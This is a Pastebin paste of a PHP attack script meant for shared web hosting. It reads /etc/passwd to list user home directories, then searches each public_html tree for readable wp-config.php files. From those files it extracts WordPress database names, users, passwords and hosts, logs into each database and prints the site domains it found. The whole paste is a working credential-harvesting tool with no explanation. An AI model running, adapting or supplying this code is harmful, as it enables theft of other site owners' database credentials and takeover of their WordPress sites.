Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- $handle = @fopen("/etc/passwd", "r");
- if ($handle) {
- while (($buffer = fgets($handle, 4096)) !== false)
- {
- $buffer=trim($buffer);
- $buffer=strstr($buffer,"/");
- $buffer=substr($buffer,0,strpos($buffer,":"));
- $buffer=trim($buffer);
- //---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- $dir=$buffer."/public_html/";
- if(is_readable($dir."/wp-config.php") && $dirs[$i]!=".")
- {
- $handle1 = @fopen($dir."/wp-config.php", "r");
- $data=array();
- if($handle1)
- {
- $dbname="";$dbuser="";$dbpassword="";$dbhost="";$table_prefix="";
- while(($buffer = fgets($handle1, 4096)) !== false)
- {
- if(strstr($buffer,"DB_NAME")){$dbname=strstr($buffer,",");$dbname=strstr($dbname,"'");$dbname=substr($dbname,1,strrpos($dbname,"'")-1);$dbname=trim($dbname);}
- if(strstr($buffer,"DB_USER")){$dbuser=strstr($buffer,",");$dbuser=strstr($dbuser,"'");$dbuser=substr($dbuser,1,strrpos($dbuser,"'")-1);$dbuser=trim($dbuser);}
- if(strstr($buffer,"DB_PASSWORD")){$dbpassword=strstr($buffer,",");$dbpassword=strstr($dbpassword,"'");$dbpassword=substr($dbpassword,1,strrpos($dbpassword,"'")-1);$dbpassword=trim($dbpassword);}
- if(strstr($buffer,"DB_HOST")){$dbhost=strstr($buffer,",");$dbhost=strstr($dbhost,"'");$dbhost=substr($dbhost,1,strrpos($dbhost,"'")-1);$dbhost=trim($dbhost);}
- if(strstr($buffer,"table_prefix")){$table_prefix=strstr($buffer,"'");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"'"));$table_prefix=trim($table_prefix);}if($table_prefix==""){$table_prefix=strstr($buffer,"\"");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"\""));$table_prefix=trim($table_prefix);}
- }
- $g_link = mysql_connect($dbhost, $dbuser, $dbpassword);
- if($g_link)
- {
- mysql_select_db($dbname, $g_link);
- $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
- $data=mysql_fetch_assoc($result);
- $id=$data['ID'];
- $user=$data['user_login'];
- $password=$data['user_pass'];
- $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
- $row = mysql_fetch_assoc($result);$site=$row['option_value'];$site=str_replace("http://","",$site);$site=str_replace("https://","",$site);if(strstr($site,"/")){$site=substr($site,0,strpos($site,"/"));}$site=str_replace("www.","",$site);
- echo($site."\r\n");
- echo($dir."\r\n");
- }
- }
- }
- //---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- if(is_readable($dir))
- {
- $dirs = scandir($dir);
- for($i=0;$i<count($dirs);$i++)
- {
- //��������� ���������� � ������
- //-----------------------------------------------------------------------------------
- if(strstr($dirs[$i],".") && substr($dirs[$i],0,1)!="." && is_dir($dir.$dirs[$i]))
- {
- echo($dirs[$i]."\r\n");
- echo($dir."\r\n");
- }
- //-----------------------------------------------------------------------------------
- if(is_readable($dir."/".$dirs[$i]."/wp-config.php") && $dirs[$i]!=".")
- {
- $handle1 = @fopen($dir."/".$dirs[$i]."/wp-config.php", "r");
- $data=array();
- if($handle1)
- {
- $dbname="";$dbuser="";$dbpassword="";$dbhost="";$table_prefix="";
- while(($buffer = fgets($handle1, 4096)) !== false)
- {
- if(strstr($buffer,"DB_NAME")){$dbname=strstr($buffer,",");$dbname=strstr($dbname,"'");$dbname=substr($dbname,1,strrpos($dbname,"'")-1);$dbname=trim($dbname);}
- if(strstr($buffer,"DB_USER")){$dbuser=strstr($buffer,",");$dbuser=strstr($dbuser,"'");$dbuser=substr($dbuser,1,strrpos($dbuser,"'")-1);$dbuser=trim($dbuser);}
- if(strstr($buffer,"DB_PASSWORD")){$dbpassword=strstr($buffer,",");$dbpassword=strstr($dbpassword,"'");$dbpassword=substr($dbpassword,1,strrpos($dbpassword,"'")-1);$dbpassword=trim($dbpassword);}
- if(strstr($buffer,"DB_HOST")){$dbhost=strstr($buffer,",");$dbhost=strstr($dbhost,"'");$dbhost=substr($dbhost,1,strrpos($dbhost,"'")-1);$dbhost=trim($dbhost);}
- if(strstr($buffer,"table_prefix")){$table_prefix=strstr($buffer,"'");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"'"));$table_prefix=trim($table_prefix);}if($table_prefix==""){$table_prefix=strstr($buffer,"\"");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"\""));$table_prefix=trim($table_prefix);}
- }
- $g_link = mysql_connect($dbhost, $dbuser, $dbpassword);
- if($g_link)
- {
- mysql_select_db($dbname, $g_link);
- $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
- $data=mysql_fetch_assoc($result);
- $id=$data['ID'];
- $user=$data['user_login'];
- $password=$data['user_pass'];
- $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
- $row = mysql_fetch_assoc($result);$site=$row['option_value'];$site=str_replace("http://","",$site);$site=str_replace("https://","",$site);if(strstr($site,"/")){$site=substr($site,0,strpos($site,"/"));}$site=str_replace("www.","",$site);
- echo($site."\r\n");
- echo($dir."/".$dirs[$i]."\r\n");
- }
- }
- }
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement